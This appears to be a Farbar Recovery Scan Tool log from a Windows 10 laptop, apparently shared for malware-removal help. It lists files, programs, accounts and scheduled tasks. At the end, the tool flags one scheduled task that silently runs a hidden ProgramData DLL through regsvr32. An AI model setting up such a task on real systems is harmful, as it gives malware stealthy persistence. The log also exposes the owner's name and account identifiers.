2017-06-10 01:26 - 2017-06-10 01:26 - 00056832 _____ (Microsoft Corporation) C:\WINDOWS\system32\cldapi.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00050176 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\cldapi.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00050176 _____ (Microsoft Corporation) C:\WINDOWS\system32\catsrvps.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00032004 _____ C:\WINDOWS\system32\edgehtmlpluginpolicy.bin
2017-06-10 01:26 - 2017-06-10 01:26 - 00029696 _____ (Microsoft Corporation) C:\WINDOWS\system32\odbcconf.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00027136 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ksthunk.sys
2017-06-10 01:26 - 2017-06-10 01:26 - 00027040 _____ (Microsoft Corporation) C:\WINDOWS\system32\browser_broker.exe
2017-06-10 01:26 - 2017-06-10 01:26 - 00025088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\odbcconf.dll
2017-06-10 01:26 - 2017-06-10 01:26 - 00015872 _____ (Microsoft Corporation) C:\WINDOWS\system32\snmptrap.exe
2017-06-10 01:26 - 2017-06-10 01:26 - 00013312 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\rootmdm.sys
2017-06-10 01:17 - 2017-06-10 01:17 - 00008192 _____ C:\WINDOWS\system32\config\userdiff
2017-06-10 01:17 - 2017-06-09 21:37 - 00000000 ____D C:\WINDOWS\ServiceProfiles
2017-06-10 01:10 - 2017-06-10 01:10 - 00000000 ____D C:\Program Files\Reference Assemblies
2017-06-10 01:10 - 2017-06-10 01:10 - 00000000 ____D C:\Program Files\MSBuild
2017-06-10 01:10 - 2017-06-10 01:10 - 00000000 ____D C:\Program Files (x86)\Reference Assemblies
2017-06-10 01:10 - 2017-06-10 01:10 - 00000000 ____D C:\Program Files (x86)\MSBuild
2017-06-10 01:09 - 2017-06-10 01:09 - 01087488 _____ (Microsoft Corporation) C:\WINDOWS\system32\reseteng.dll
2017-06-10 01:09 - 2017-02-10 15:26 - 01166520 _____ (Microsoft Corporation) C:\WINDOWS\system32\PresentationNative_v0300.dll
2017-06-10 01:09 - 2017-02-10 15:26 - 00124624 _____ (Microsoft Corporation) C:\WINDOWS\system32\PresentationCFFRasterizerNative_v0300.dll
2017-06-10 01:09 - 2017-02-10 15:26 - 00035480 _____ (Microsoft Corporation) C:\WINDOWS\system32\TsWpfWrp.exe
2017-06-10 01:09 - 2017-02-10 15:21 - 00778936 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PresentationNative_v0300.dll
2017-06-10 01:09 - 2017-02-10 15:21 - 00103120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PresentationCFFRasterizerNative_v0300.dll
2017-06-10 01:09 - 2017-02-10 15:21 - 00035480 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TsWpfWrp.exe
2017-06-09 22:14 - 2017-06-09 22:14 - 00000000 _SHDL C:\Users\Default\My Documents
2017-06-09 22:11 - 2017-06-09 22:13 - 00007623 _____ C:\WINDOWS\diagwrn.xml
2017-06-09 22:11 - 2017-06-09 22:13 - 00007623 _____ C:\WINDOWS\diagerr.xml
2017-06-09 22:03 - 2017-07-03 23:58 - 00004184 _____ C:\WINDOWS\System32\Tasks\User_Feed_Synchronization-{A704DC1E-F604-4563-996D-8EFD920B7276}
2017-06-09 22:03 - 2017-07-03 20:54 - 00000006 ____H C:\WINDOWS\Tasks\SA.DAT
2017-06-09 22:03 - 2017-06-21 17:23 - 00003310 _____ C:\WINDOWS\System32\Tasks\OneDrive Standalone Update Task v2
2017-06-09 22:03 - 2017-06-09 22:04 - 00003344 _____ C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineUA
2017-06-09 22:03 - 2017-06-09 22:04 - 00003094 _____ C:\WINDOWS\System32\Tasks\PCDDataUploadTask
2017-06-09 22:03 - 2017-06-09 22:04 - 00003080 _____ C:\WINDOWS\System32\Tasks\{A0D2D779-C325-C9CD-794C-617EE523AB5C}
2017-06-09 22:03 - 2017-06-09 22:03 - 00003448 _____ C:\WINDOWS\System32\Tasks\DropboxUpdateTaskMachineUA
2017-06-09 22:03 - 2017-06-09 22:03 - 00003224 _____ C:\WINDOWS\System32\Tasks\DropboxUpdateTaskMachineCore
2017-06-09 22:03 - 2017-06-09 22:03 - 00003120 _____ C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineCore
2017-06-09 22:03 - 2017-06-09 22:03 - 00002980 _____ C:\WINDOWS\System32\Tasks\SystemToolsDailyTest
2017-06-09 22:03 - 2017-06-09 22:03 - 00002304 _____ C:\WINDOWS\System32\Tasks\RtHDVBg_PushButton
2017-06-09 22:03 - 2017-06-09 22:03 - 00002262 _____ C:\WINDOWS\System32\Tasks\DropboxOEM
2017-06-09 22:02 - 2017-07-03 21:01 - 01097048 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2017-06-09 21:54 - 2017-06-09 21:54 - 00001576 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Media Player.lnk
2017-06-09 21:48 - 2017-06-09 21:48 - 00000000 ____D C:\ProgramData\USOShared
2017-06-09 21:46 - 2017-06-09 21:55 - 00000000 ____D C:\WINDOWS\system32\config\bbimigrate
2017-06-09 21:43 - 2017-07-03 20:55 - 00000000 ____D C:\Users\Herbert Holland
2017-06-09 21:43 - 2017-06-09 21:43 - 00000000 _SHDL C:\Users\Herbert Holland\My Documents
2017-06-09 21:43 - 2017-06-09 21:43 - 00000000 _SHDL C:\Users\Herbert Holland\Documents\My Videos
2017-06-09 21:43 - 2017-06-09 21:43 - 00000000 _SHDL C:\Users\Herbert Holland\Documents\My Pictures
2017-06-09 21:43 - 2017-06-09 21:43 - 00000000 _SHDL C:\Users\Herbert Holland\Documents\My Music
2017-06-09 21:41 - 2017-07-03 20:55 - 00000180 _____ C:\WINDOWS\system32\{A6D608F0-0BDE-491A-97AE-5C4B05D86E01}.bat
2017-06-09 21:41 - 2017-06-09 21:47 - 00000000 ____D C:\Program Files\Intel
2017-06-09 21:41 - 2017-06-09 21:41 - 00000200 _____ C:\WINDOWS\system32\{EC94D02F-D200-4428-9531-05AF7F9799CB}.bat
2017-06-09 21:41 - 2017-06-09 21:41 - 00000000 ____H C:\WINDOWS\system32\Drivers\Msft_Kernel_SynTP_01011.Wdf
2017-06-09 21:41 - 2017-06-09 21:41 - 00000000 ____H C:\ProgramData\DP45977C.lfl
2017-06-09 21:41 - 2017-06-09 21:41 - 00000000 ____D C:\Program Files\Synaptics
2017-06-09 21:41 - 2015-09-09 17:25 - 00086528 _____ (Khronos Group) C:\WINDOWS\SysWOW64\OpenCL.DLL
2017-06-09 21:41 - 2015-09-09 17:25 - 00082432 _____ (Khronos Group) C:\WINDOWS\system32\OpenCL.DLL
2017-06-09 21:40 - 2017-06-09 21:40 - 00000000 ____D C:\WINDOWS\SysWOW64\RTCOM
2017-06-09 21:40 - 2017-06-09 21:40 - 00000000 ____D C:\WINDOWS\system32\SRSLabs
2017-06-09 21:40 - 2017-06-09 21:40 - 00000000 ____D C:\Program Files\Realtek
2017-06-09 21:40 - 2017-06-09 21:40 - 00000000 ____D C:\Program Files\Common Files\Atheros
2017-06-09 21:40 - 2017-03-18 16:56 - 02233344 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PrintConfig.dll
2017-06-09 21:37 - 2017-07-03 23:55 - 00000000 ____D C:\WINDOWS\system32\SleepStudy
2017-06-09 21:37 - 2017-06-22 16:05 - 00380328 _____ C:\WINDOWS\system32\FNTCACHE.DAT
2017-06-06 20:29 - 2017-06-06 20:29 - 00000044 _____ C:\Users\Herbert Holland\AppData\Roaming\WB.CFG
2017-06-05 20:20 - 2017-06-05 20:20 - 526396500 _____ C:\WINDOWS\MEMORY.DMP
2017-06-05 19:46 - 2017-06-22 18:28 - 00000000 ____D C:\Program Files\COMODO
2017-06-05 19:46 - 2017-06-10 07:03 - 00000258 __RSH C:\ProgramData\ntuser.pol
2017-06-05 19:46 - 2017-06-05 19:51 - 00000000 ____D C:\ProgramData\COMODO
2017-06-05 19:45 - 2017-06-05 19:52 - 00000000 ____D C:\ProgramData\{FA261CBF-4D8D-AB14-387A-85979BEA4BF2}
2017-06-05 19:45 - 2017-06-05 19:45 - 00000000 ____D C:\ProgramData\{6FCCF43A-D867-4391-5D6F-B12BEB126548}
2017-06-05 19:43 - 2017-06-22 16:37 - 00000000 ____D C:\Users\Herbert Holland\AppData\Local\Lavasoft
2017-06-05 19:42 - 2017-06-05 19:42 - 00000000 ____D C:\Users\Herbert Holland\AppData\Local\CrashRpt
2017-06-05 19:41 - 2017-07-03 19:38 - 00000000 ____D C:\Program Files (x86)\Lavasoft
2017-06-05 19:41 - 2017-06-22 16:37 - 00000000 ____D C:\ProgramData\Lavasoft
2017-06-05 19:27 - 2017-06-05 19:27 - 00000000 ____H C:\WINDOWS\system32\Drivers\Msft_User_WpdMtpDr_01_11_00.Wdf
2017-06-05 00:04 - 2017-06-05 00:04 - 00037169 _____ C:\WINDOWS\uninstaller.dat
2017-06-04 19:00 - 2017-06-10 07:04 - 00000000 ___DC C:\WINDOWS\Panther

==================== One Month Modified files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2017-07-03 20:57 - 2016-04-12 16:38 - 00000000 ____D C:\ProgramData\PCDr
2017-07-03 20:55 - 2016-06-16 20:24 - 00000000 __SHD C:\Users\Herbert Holland\IntelGraphicsProfiles
2017-07-03 20:53 - 2017-03-18 07:40 - 00786432 _____ C:\WINDOWS\system32\config\BBI
2017-07-03 20:45 - 2017-03-18 17:01 - 00000000 ____D C:\WINDOWS\INF
2017-07-03 19:46 - 2016-11-18 10:36 - 00192216 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\MBAMSwissArmy.sys
2017-07-03 17:48 - 2016-04-12 16:28 - 00000000 ____D C:\Program Files\Dell
2017-07-03 13:57 - 2016-04-12 16:28 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Dell
2017-07-03 13:30 - 2017-03-18 17:03 - 00000000 ____D C:\WINDOWS\rescache
2017-07-03 13:00 - 2017-03-18 17:03 - 00000000 ___HD C:\Program Files\WindowsApps
2017-07-03 13:00 - 2017-03-18 17:03 - 00000000 ____D C:\WINDOWS\AppReadiness
2017-07-03 12:57 - 2016-08-21 17:05 - 00002304 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2017-07-03 12:57 - 2016-08-21 17:05 - 00002292 _____ C:\Users\Public\Desktop\Google Chrome.lnk
2017-06-22 22:53 - 2017-03-18 16:51 - 00000000 ____D C:\WINDOWS\CbsTemp
2017-06-22 22:23 - 2016-10-30 11:25 - 00000214 _____ C:\WINDOWS\Tasks\CreateExplorerShellUnelevatedTask.job
2017-06-22 22:13 - 2017-02-16 23:07 - 00000000 ____D C:\Users\Herbert Holland\AppData\Local\ElevatedDiagnostics
2017-06-22 18:28 - 2016-07-16 07:47 - 00000000 ____D C:\WINDOWS\system32\Tasks_Migrated
2017-06-22 16:26 - 2016-11-18 09:57 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Revo Uninstaller
2017-06-22 16:13 - 2016-04-12 17:05 - 00000000 __RHD C:\Users\Public\AccountPictures
2017-06-22 16:03 - 2017-03-18 17:03 - 00000000 ____D C:\WINDOWS\system32\oobe
2017-06-22 16:03 - 2017-03-18 17:03 - 00000000 ____D C:\WINDOWS\system32\appraiser
2017-06-22 16:01 - 2016-06-16 20:29 - 00000000 ___RD C:\Users\Herbert Holland\OneDrive
2017-06-22 14:53 - 2017-03-18 17:03 - 00000000 ____D C:\WINDOWS\LiveKernelReports
2017-06-21 17:23 - 2016-08-21 16:42 - 00002395 _____ C:\Users\Herbert Holland\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk
2017-06-20 04:03 - 2016-04-12 16:50 - 00000000 ____D C:\Program Files (x86)\Microsoft Office
2017-06-18 08:50 - 2016-08-21 20:29 - 00000000 ____D C:\WINDOWS\system32\MRT
2017-06-18 08:43 - 2016-08-21 20:29 - 133627792 ____C (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe
2017-06-18 08:06 - 2017-03-18 17:03 - 00000000 ____D C:\ProgramData\regid.1991-06.com.microsoft
2017-06-17 09:45 - 2016-09-02 17:04 - 00000000 ____D C:\Users\Herbert Holland\AppData\Local\ConnectedDevicesPlatform
2017-06-13 14:09 - 2017-03-18 17:03 - 00000000 ____D C:\WINDOWS\appcompat
2017-06-10 07:24 - 2016-08-21 16:37 - 00000000 ____D C:\Users\Herbert Holland\AppData\Local\Packages
2017-06-10 07:05 - 2017-03-18 17:03 - 00000000 ___RD C:\WINDOWS\ImmersiveControlPanel
2017-06-10 07:00 - 2016-08-21 19:17 - 00000000 ____D C:\WINDOWS\SysWOW64\sda
2017-06-10 01:36 - 2017-03-18 17:03 - 00028672 _____ C:\WINDOWS\system32\config\BCD-Template
2017-06-10 01:29 - 2017-03-18 17:06 - 00000000 ____D C:\WINDOWS\Setup
2017-06-10 01:28 - 2017-03-18 17:03 - 00000000 ___SD C:\WINDOWS\SysWOW64\F12
2017-06-10 01:28 - 2017-03-18 17:03 - 00000000 ___SD C:\WINDOWS\system32\F12
2017-06-10 01:28 - 2017-03-18 17:03 - 00000000 ___RD C:\Program Files\Windows Defender
2017-06-10 01:28 - 2017-03-18 17:03 - 00000000 ____D C:\WINDOWS\SysWOW64\Dism
2017-06-10 01:28 - 2017-03-18 17:03 - 00000000 ____D C:\WINDOWS\system32\WinBioPlugIns
2017-06-10 01:28 - 2017-03-18 17:03 - 00000000 ____D C:\WINDOWS\ShellExperiences
2017-06-10 01:28 - 2017-03-18 17:03 - 00000000 ____D C:\WINDOWS\Provisioning
2017-06-10 01:28 - 2017-03-18 17:03 - 00000000 ____D C:\Program Files\Windows Photo Viewer
2017-06-10 01:28 - 2017-03-18 17:03 - 00000000 ____D C:\Program Files (x86)\Windows Photo Viewer
2017-06-10 01:28 - 2017-03-18 07:40 - 00000000 ____D C:\WINDOWS\system32\Dism
2017-06-09 22:13 - 2017-03-18 17:03 - 00000000 ____D C:\WINDOWS\system32\WinBioDatabase
2017-06-09 22:13 - 2017-03-18 07:40 - 00032768 _____ C:\WINDOWS\system32\config\ELAM
2017-06-09 22:10 - 2017-03-18 17:03 - 00000000 ____D C:\WINDOWS\Registration
2017-06-09 22:04 - 2017-03-18 22:31 - 00000000 ____D C:\WINDOWS\HoloShell
2017-06-09 22:04 - 2016-08-21 15:56 - 00022840 _____ C:\WINDOWS\system32\emptyregdb.dat
2017-06-09 22:02 - 2017-03-18 17:03 - 00000000 __RHD C:\Users\Public\Libraries
2017-06-09 21:55 - 2017-05-23 21:51 - 00000000 ____D C:\WINDOWS\system32\UNP
2017-06-09 21:55 - 2016-11-18 10:36 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2017-06-09 21:55 - 2016-04-12 16:54 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Office 2016 Tools
2017-06-09 21:55 - 2016-04-12 16:36 - 00000000 ____D C:\WINDOWS\system32\nn-NO
2017-06-09 21:55 - 2016-04-12 16:34 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Dell Audio
2017-06-09 21:54 - 2016-08-21 18:27 - 00000000 ____D C:\Users\Default.migrated
2017-06-09 21:48 - 2017-03-18 17:03 - 00000000 ____D C:\WINDOWS\SysWOW64\GroupPolicy
2017-06-09 21:48 - 2017-03-18 17:03 - 00000000 ____D C:\WINDOWS\system32\spool
2017-06-09 21:48 - 2017-03-18 17:03 - 00000000 ____D C:\WINDOWS\system32\NDF
2017-06-09 21:48 - 2017-03-18 17:03 - 00000000 ____D C:\ProgramData\USOPrivate
2017-06-09 21:48 - 2017-02-16 22:31 - 00000000 ____D C:\WINDOWS\SysWOW64\Dell
2017-06-09 21:47 - 2017-03-18 17:03 - 00000000 ____D C:\Program Files\Common Files\microsoft shared
2017-06-09 21:46 - 2015-10-30 03:24 - 00000000 ___HD C:\WINDOWS\system32\GroupPolicy
2017-06-09 21:42 - 2017-03-18 07:40 - 00000000 ____D C:\WINDOWS\system32\Sysprep
2017-06-05 20:29 - 2016-04-12 16:32 - 00000000 ___HD C:\Program Files (x86)\InstallShield Installation Information
2017-06-03 02:32 - 2017-03-18 17:06 - 00835576 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerApp.exe
2017-06-03 02:32 - 2017-03-18 17:06 - 00177656 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerCPLApp.cpl

==================== Files in the root of some directories =======

2017-06-06 20:29 - 2017-06-06 20:29 - 0000044 _____ () C:\Users\Herbert Holland\AppData\Roaming\WB.CFG
2017-06-09 21:41 - 2017-06-09 21:41 - 0000000 ____H () C:\ProgramData\DP45977C.lfl

Some files in TEMP:
====================
2017-07-03 17:55 - 2017-03-18 16:57 - 1930320 _____ (Microsoft Corporation) C:\Users\Herbert Holland\AppData\Local\Temp\dllnt_dump.dll
2017-06-22 16:22 - 2017-06-22 16:23 - 7178424 _____ (VS Revo Group ) C:\Users\Herbert Holland\AppData\Local\Temp\VSUSetup.exe

==================== Bamital & volsnap ======================

(There is no automatic fix for files that do not pass verification.)

C:\WINDOWS\system32\winlogon.exe => File is digitally signed
C:\WINDOWS\system32\wininit.exe => File is digitally signed
C:\WINDOWS\explorer.exe => File is digitally signed
C:\WINDOWS\SysWOW64\explorer.exe => File is digitally signed
C:\WINDOWS\system32\svchost.exe => File is digitally signed
C:\WINDOWS\SysWOW64\svchost.exe => File is digitally signed
C:\WINDOWS\system32\services.exe => File is digitally signed
C:\WINDOWS\system32\User32.dll => File is digitally signed
C:\WINDOWS\SysWOW64\User32.dll => File is digitally signed
C:\WINDOWS\system32\userinit.exe => File is digitally signed
C:\WINDOWS\SysWOW64\userinit.exe => File is digitally signed
C:\WINDOWS\system32\rpcss.dll => File is digitally signed
C:\WINDOWS\system32\dnsapi.dll => File is digitally signed
C:\WINDOWS\SysWOW64\dnsapi.dll => File is digitally signed
C:\WINDOWS\system32\Drivers\volsnap.sys => File is digitally signed

LastRegBack: 2017-07-03 13:06

==================== End of FRST.txt ============================

 

[RichH]

Additional scan result of Farbar Recovery Scan Tool (x64) Version: 03-07-2017 01
Ran by Herbert Holland (03-07-2017 23:59:15)
Running from C:\Users\Herbert Holland\Desktop\VirusCleaners
Windows 10 Home Version 1703 (X64) (2017-06-10 02:15:46)
Boot Mode: Normal
==========================================================


==================== Accounts: =============================

Administrator (S-1-5-21-38309054-1687653055-3029875360-500 - Administrator - Disabled)
DefaultAccount (S-1-5-21-38309054-1687653055-3029875360-503 - Limited - Disabled)
Guest (S-1-5-21-38309054-1687653055-3029875360-501 - Limited - Disabled)
Herbert Holland (S-1-5-21-38309054-1687653055-3029875360-1001 - Administrator - Enabled) => C:\Users\Herbert Holland

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installed Programs ======================

(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

Citrix Online Launcher (HKLM-x32\...\{97C200CA-BF24-41B9-B111-A7E47F8FD57E}) (Version: 1.0.456 - Citrix)
Dell Customer Connect (HKLM-x32\...\{4FA72FF9-DD64-43A8-8704-6380A11F11D5}) (Version: 1.4.15.0 - Dell Inc.)
Dell Digital Delivery (HKLM-x32\...\{AB7F2792-2ED1-4C5C-9F28-680E5110BF72}) (Version: 3.1.1018.0 - Dell Products, LP)
Dell Foundation Services (HKLM\...\{BDB50421-E961-42F3-B803-6DAC6F173834}) (Version: 3.4.16100.0 - Dell Inc.)
Dell Help & Support (HKLM\...\{E8669F4E-F2BE-48A9-B5A5-0BC12CA4CB4F}) (Version: 2.4.18.0 - Dell Inc.) Hidden
Dell Help & Support (HKLM-x32\...\InstallShield_{E8669F4E-F2BE-48A9-B5A5-0BC12CA4CB4F}) (Version: 2.4.18.0 - Dell Inc.)
Dell Product Registration (HKLM-x32\...\InstallShield_{48114909-3C3B-43E6-BF98-AE9C396500A3}) (Version: 3.0.127.0 - Dell Inc.)
Dell SupportAssist (HKLM\...\PC-Doctor for Windows) (Version: 2.0.6875.402 - Dell)
Dell SupportAssistAgent (HKLM\...\{90881C8E-6C4F-4662-9923-85AFCA058C44}) (Version: 2.0.1.7 - Dell)
Dell Touchpad (HKLM\...\SynTPDeinstKey) (Version: 19.0.15.15 - Synaptics Incorporated)
Dell Update - SupportAssist Update Plugin (HKLM\...\{EEA45885-F3E3-4E7D-8435-E9C21D36C141}) (Version: 3.0.0.2840 - Dell Inc.)
Dell Update (HKLM-x32\...\{2BE9948C-FD9C-40B0-AC04-EE2AAB4C19D4}) (Version: 1.8.1114.0 - Dell Inc.)
Dell WLAN and Bluetooth Client Installation (HKLM-x32\...\{28006915-2739-4EBE-B5E8-49B25D32EB33}) (Version: 10.0 - Dell Inc.)
Dropbox 20 GB (HKLM-x32\...\{0867A88D-764F-366E-9E21-130DA8B472C3}) (Version: 3.1.18.0 - Dropbox, Inc.)
Dropbox Update Helper (HKLM-x32\...\{099218A5-A723-43DC-8DB5-6173656A1E94}) (Version: 1.3.59.1 - Dropbox, Inc.) Hidden
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 59.0.3071.115 - Google Inc.)
Google Update Helper (HKLM-x32\...\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}) (Version: 1.3.33.5 - Google Inc.) Hidden
GoToAssist Customer 3.1.0.1251 (HKLM-x32\...\GoToAssist Express Customer) (Version: 3.1.0.1251 - Citrix Online)
Intel(R) Chipset Device Software (HKLM-x32\...\{60c073df-e736-4210-9c3a-5fc2b651cef3}) (Version: 10.1.1.7 - Intel(R) Corporation) Hidden
Intel(R) Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 10.18.15.4256 - Intel Corporation)
Intel(R) Trusted Execution Engine (HKLM\...\{176E2755-0A17-42C6-88E2-192AB2131278}) (Version: 2.0.0.1067 - Intel Corporation)
Intel® Security Assist (HKLM-x32\...\{84DB01CB-7EB7-4261-9249-99A32768D991}) (Version: 1.0.0.523 - Intel Corporation)
Malwarebytes Anti-Malware version 2.2.1.1043 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.2.1.1043 - Malwarebytes)
Maxx Audio Installer (x64) (HKLM\...\{307032B2-6AF2-46D7-B933-62438DEB2B9A}) (Version: 2.6.6570.2 - Waves Audio Ltd.) Hidden
Microsoft Office 365 - en-us (HKLM\...\O365HomePremRetail - en-us) (Version: 16.0.8201.2102 - Microsoft Corporation)
Microsoft OneDrive (HKU\S-1-5-21-38309054-1687653055-3029875360-1001\...\OneDriveSetup.exe) (Version: 17.3.6917.0607 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.21022 (HKLM\...\{350AA351-21FA-3270-8B7A-835434E766AD}) (Version: 9.0.21022 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022 (HKLM-x32\...\{FF66E9F6-83E7-3A3E-AF14-8DE9A809A6A4}) (Version: 9.0.21022 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Office 16 Click-to-Run Extensibility Component (HKLM-x32\...\{90160000-008C-0000-0000-0000000FF1CE}) (Version: 16.0.8201.2102 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Extensibility Component 64-bit Registration (HKLM\...\{90160000-00DD-0000-1000-0000000FF1CE}) (Version: 16.0.8201.2102 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Licensing Component (HKLM\...\{90160000-008F-0000-1000-0000000FF1CE}) (Version: 16.0.8201.2102 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Localization Component (HKLM-x32\...\{90160000-008C-0409-0000-0000000FF1CE}) (Version: 16.0.8201.2075 - Microsoft Corporation) Hidden
Product Registration (HKLM\...\{48114909-3C3B-43E6-BF98-AE9C396500A3}) (Version: 3.0.127.0 - Dell Inc.) Hidden
Qualcomm Atheros Bluetooth Suite (64) (HKLM\...\{A84A4FB1-D703-48DB-89E0-68B6499D2801}) (Version: 10.0.1.0 - Qualcomm Atheros)
QuickSet64 (HKLM\...\{87CF757E-C1F1-4D22-865C-00C6950B5258}) (Version: 11.1.31 - Dell Inc.)
Realtek Card Reader (HKLM-x32\...\{5BC2B5AB-80DE-4E83-B8CF-426902051D0A}) (Version: 6.3.9600.31213 - Realtek Semiconductor Corp.)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7654 - Realtek Semiconductor Corp.)
Realtek USB Ethernet Controller All-In-One Windows Driver (HKLM-x32\...\{04201224-2B34-4EE7-862B-B7BBF89DB3AB}) (Version: 10.1.506.2015 - Realtek)
Revo Uninstaller 2.0.3 (HKLM\...\{A28DBDA2-3CC7-4ADC-8BFE-66D7743C6C97}_is1) (Version: 2.0.3 - VS Revo Group, Ltd.)
RogueKiller version 12.11.5.0 (HKLM\...\8B3D7924-ED89-486B-8322-E8594065D5CB_is1) (Version: 12.11.5.0 - Adlice Software)
Windows 10 Update and Privacy Settings (HKLM\...\{293F2009-0145-450B-B4AA-063D43FB368C}) (Version: 1.0.13.0 - Microsoft Corporation)
Windows Driver Package - Intel Corporation (iagpioe) System (05/21/2015 604.10120.2652.361) (HKLM\...\AF9226384B030787C4D0F761A23F48F7649D6D17) (Version: 05/21/2015 604.10120.2652.361 - Intel Corporation)
Windows Driver Package - Intel Corporation (iai2ce) System (05/21/2015 604.10120.2654.367) (HKLM\...\B37036F6A0766DAC3E418F6CAE67005C5F3A8C40) (Version: 05/21/2015 604.10120.2654.367 - Intel Corporation)
Windows Driver Package - Intel Corporation (iauarte) System (05/21/2015 604.10120.2653.391) (HKLM\...\1D4FF76A05A14FF5BA3636A41E0AB237F3A55E14) (Version: 05/21/2015 604.10120.2653.391 - Intel Corporation)

==================== Custom CLSID (Whitelisted): ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

ContextMenuHandlers03: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamext.dll [2016-03-10] (Malwarebytes)
ContextMenuHandlers05: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} => -> No File
ContextMenuHandlers05: [igfxDTCM] -> {9B5F5829-A529-4B12-814A-E81BCB8D93FC} => C:\WINDOWS\system32\igfxDTCM.dll [2015-09-09] (Intel Corporation)
ContextMenuHandlers06: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamext.dll [2016-03-10] (Malwarebytes)

==================== Scheduled Tasks (Whitelisted) =============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {07EC7B9F-0A90-45EB-8BB2-E35B533D62A0} - System32\Tasks\DropboxUpdateTaskMachineCore => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [2016-11-18] (Dropbox, Inc.)
Task: {1740F8A7-B1E3-4A6E-85F3-6A600F4EE159} - System32\Tasks\Microsoft\Office\Office ClickToRun Service Monitor => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [2017-06-10] (Microsoft Corporation)
Task: {26826475-81A7-4D36-90AB-22743FDE1E86} - System32\Tasks\Dell SupportAssistAgent AutoUpdate => C:\Program Files\Dell\SupportAssistAgent\bin\SupportAssist.exe [2017-06-28] (Dell Inc.)
Task: {2BCF15C0-4EEB-4AE9-A4C3-52FCD08A03A5} - System32\Tasks\SystemToolsDailyTest => uaclauncher.exe
Task: {384DACBD-A60E-4E12-9255-81F82525401D} - System32\Tasks\DropboxUpdateTaskMachineUA => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [2016-11-18] (Dropbox, Inc.)
Task: {44DA1264-931F-48B4-8E99-657B3614D05D} - System32\Tasks\PCDDataUploadTask => uaclauncher.exe
Task: {577037E2-4F56-41C2-8FAD-FAF276B42126} - System32\Tasks\Microsoft\Office\Office Automatic Updates => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [2017-06-10] (Microsoft Corporation)
Task: {6458FECC-36A5-4AEA-BE85-AB6581097D9F} - System32\Tasks\{A0D2D779-C325-C9CD-794C-617EE523AB5C} => Regsvr32.exe /s /n /I:"/rt" "C:\PROGRA~3\e26b0e7f\ffe3a8c0.dll" <==== ATTENTION
